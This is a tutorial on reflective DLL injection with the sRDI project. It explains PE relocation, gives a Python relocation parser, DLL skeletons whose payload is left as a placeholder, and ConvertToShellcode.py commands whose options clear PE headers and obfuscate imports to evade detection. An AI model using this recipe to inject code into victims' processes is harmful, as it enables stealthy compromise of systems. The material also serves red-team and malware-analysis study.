Reflective DLL injection is a technique that allows an attacker to inject a DLL into a victim process from memory rather than from disk.
When a PE file is loaded into memory, it expects to be placed at a specific base address, usually the one it was linked to at compile time. However, for reasons such as address space conflicts or dynamic loading, the actual base address is often different. The PE file then has to be relocated: every absolute memory reference recorded in its relocation table is adjusted by the difference between the preferred and the actual base. The technique consists of mapping the DLL into memory and relocating it so that the process can execute it.
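The relocation step described above, as an added example written for this page (not code from sRDI): the script parses IMAGE_BASE_RELOCATION blocks from a .reloc section and applies the base delta to a constructed 64-bit image; the preferred and actual bases are assumed values, and the same logic is what an analyst needs to rebase a memory-dumped image before examining it.

```python
import struct

IMAGE_REL_BASED_ABSOLUTE = 0   # winnt.h relocation types: padding entry, skipped
IMAGE_REL_BASED_HIGHLOW = 3    # 32-bit absolute address
IMAGE_REL_BASED_DIR64 = 10     # 64-bit absolute address

def parse_reloc_blocks(reloc):
    """Yield (page_rva, [(type, offset), ...]) per IMAGE_BASE_RELOCATION block."""
    pos = 0
    while pos + 8 <= len(reloc):
        page_rva, size = struct.unpack_from("<II", reloc, pos)
        if size < 8 or pos + size > len(reloc):
            raise ValueError("malformed relocation block at offset %d" % pos)
        count = (size - 8) // 2            # WORD entries after the 8-byte header
        entries = struct.unpack_from("<%dH" % count, reloc, pos + 8)
        yield page_rva, [(e >> 12, e & 0xFFF) for e in entries]
        pos += size

def apply_relocations(image, reloc, preferred_base, actual_base):
    """Patch absolute addresses in `image` (bytearray mapped at RVA 0); return fixup count."""
    delta = actual_base - preferred_base
    if delta == 0:
        return 0                          # loaded at the linked base: nothing to do
    applied = 0
    for page_rva, entries in parse_reloc_blocks(reloc):
        for typ, off in entries:
            target = page_rva + off
            if typ == IMAGE_REL_BASED_ABSOLUTE:
                continue                  # alignment padding, not a real fixup
            if typ == IMAGE_REL_BASED_DIR64:
                (val,) = struct.unpack_from("<Q", image, target)
                struct.pack_into("<Q", image, target, (val + delta) & (2**64 - 1))
            elif typ == IMAGE_REL_BASED_HIGHLOW:
                (val,) = struct.unpack_from("<I", image, target)
                struct.pack_into("<I", image, target, (val + delta) & 0xFFFFFFFF)
            else:
                raise ValueError("unsupported relocation type %d" % typ)
            applied += 1
    return applied

def demo():
    """Constructed sample: one page holding three 64-bit pointers into the image."""
    preferred, actual = 0x180000000, 0x7FF600000000   # assumed bases
    image = bytearray(0x1000)
    for off, rva in ((0x10, 0x200), (0x20, 0x300), (0x30, 0x400)):
        struct.pack_into("<Q", image, off, preferred + rva)
    reloc = struct.pack("<II4H", 0, 16, (10 << 12) | 0x10,   # header + 3 DIR64 + 1 pad
                        (10 << 12) | 0x20, (10 << 12) | 0x30, 0)
    n = apply_relocations(image, reloc, preferred, actual)
    return n, [struct.unpack_from("<Q", image, o)[0] for o in (0x10, 0x20, 0x30)]
```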
Shellcode Reflective DLL Injection, also known as sRDI, is a project by monoxgas.
Remember that the DLL to inject should have an exported function.
#include <windows.h>

// Exported entry point that the sRDI loader calls once the DLL is mapped.
extern "C" __declspec(dllexport) void Go(void) {
    [...OUR CODE...]
}

BOOL APIENTRY DllMain(HMODULE hModule, DWORD ul_reason_for_call, LPVOID lpReserved) {
    switch (ul_reason_for_call) {
    case DLL_PROCESS_ATTACH:
        break;
    case DLL_THREAD_ATTACH:
        break;
    case DLL_THREAD_DETACH:
        break;
    case DLL_PROCESS_DETACH:
        break;
    }
    return TRUE;
}
We can use the Python script from the repository to convert the DLL into reflective DLL shellcode. The -f option names the exported function to call after loading; -c clears the PE headers and -i obfuscates the imports (see the note below).
python ConvertToShellcode.py -f FunctionName mydll.dll
python ConvertToShellcode.py -c -i -f FunctionName mydll.dll
python ConvertToShellcode.py -c -i mydll.dll
If we don't want to specify a function name, we need to call our functions from DllMain:
#include <windows.h>

void myAttach(void);   // our code, implemented elsewhere in the DLL
void myDetach(void);

BOOL WINAPI DllMain(HINSTANCE hinst, DWORD dwReason, LPVOID reserved) {
    switch (dwReason) {
    case DLL_PROCESS_ATTACH:
        myAttach();    // runs when the loader calls DllMain after mapping the DLL
        break;
    case DLL_THREAD_ATTACH:
        break;
    case DLL_THREAD_DETACH:
        break;
    case DLL_PROCESS_DETACH:
        myDetach();
        break;
    }
    return TRUE;
}
Note: sRDI implements some extra functionality: it can obfuscate imports by randomizing the import dependency load order, and it can also clear the PE headers.
Our final loader behaves like a normal shellcode loader, but instead of using the calc.exe shellcode we use the shellcode produced by the sRDI project.